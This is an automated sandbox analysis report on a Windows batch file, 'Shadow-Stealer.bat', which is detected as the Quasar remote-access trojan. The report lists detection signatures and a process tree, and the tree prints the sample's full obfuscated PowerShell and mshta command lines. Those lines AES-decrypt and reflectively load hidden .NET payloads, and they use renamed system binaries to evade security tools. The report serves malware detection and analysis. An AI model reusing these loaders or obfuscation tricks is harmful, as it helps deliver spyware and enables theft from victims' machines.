Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Shadow-Stealer.bat

Overview

General Information

Sample Name:Shadow-Stealer.bat
Analysis ID:1352637
MD5:cf5b412ffc3ce43cd7ddce602fc67f56
SHA1:221dfcd0868158f676c472d8a5bcf9647f0c7d51
SHA256:84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724
Tags:bat
Infos:

Detection

Quasar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Quasar RAT
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Costura Assembly Loader
Renames powershell.exe to bypass HIPS
Powershell is started from unusual location (likely to bypass HIPS)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Deletes itself after installation
Found large BAT file
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Powershell connects to network
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Writes to foreign memory regions
Bypasses PowerShell execution policy
Very long command line found
Suspicious powershell command line found
Obfuscated command line found
Modifies the context of a thread in another process (thread injection)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Allocates memory with a write watch (potentially for evading sandboxes)
Detected TCP or UDP traffic on non-standard ports
Found evasive API chain (may stop execution after accessing registry keys)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

  • System is w10x64
  • cmd.exe (PID: 1668 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Shadow-Stealer.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Shadow-Stealer.bat.exe (PID: 3180 cmdline: "Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN')); MD5: 04029E121A0CFA5991749937DD22A1D9)
      • dllhost.exe (PID: 3940 cmdline: C:\Windows\System32\dllhost.exe /Processid:{2ca74e05-00fd-4f33-afb0-1baa728859ba} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • dllhost.exe (PID: 1036 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{a795ed5e-f9f8-4b9c-9e39-bf732c676d16} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
      • dllhost.exe (PID: 5576 cmdline: C:\Windows\System32\dllhost.exe /Processid:{3885b722-1a15-44b5-b09d-ff91e5413f87} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • dllhost.exe (PID: 964 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{99a849d9-b898-48bd-a9ae-8d2739f763c9} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
  • $sxr-mshta.exe (PID: 2616 cmdline: C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • $sxr-cmd.exe (PID: 1804 cmdline: "C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=% MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • $sxr-powershell.exe (PID: 6400 cmdline: C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG))) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • dllhost.exe (PID: 1088 cmdline: C:\Windows\System32\dllhost.exe /Processid:{8c0db931-f9fd-42d4-a5c0-43590a2016f6} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
        • dllhost.exe (PID: 5772 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{c14234ed-73ac-4d78-a200-79518435a2b0} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
        • $sxr-powershell.exe (PID: 5672 cmdline: "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6400).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG))) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • dllhost.exe (PID: 6336 cmdline: C:\Windows\System32\dllhost.exe /Processid:{cbe0811f-76a5-44cc-bdc5-f8341ab968a9} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
          • winlogon.exe (PID: 560 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
            • dllhost.exe (PID: 5204 cmdline: C:\Windows\System32\dllhost.exe /Processid:{92e841ec-e3f1-4b8b-895f-b885255cbce1} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
              • svchost.exe (PID: 436 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
              • svchost.exe (PID: 376 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
              • svchost.exe (PID: 60 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • dllhost.exe (PID: 3784 cmdline: C:\Windows\System32\dllhost.exe /Processid:{2e416721-4f03-488b-85bf-d48d4305e55d} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
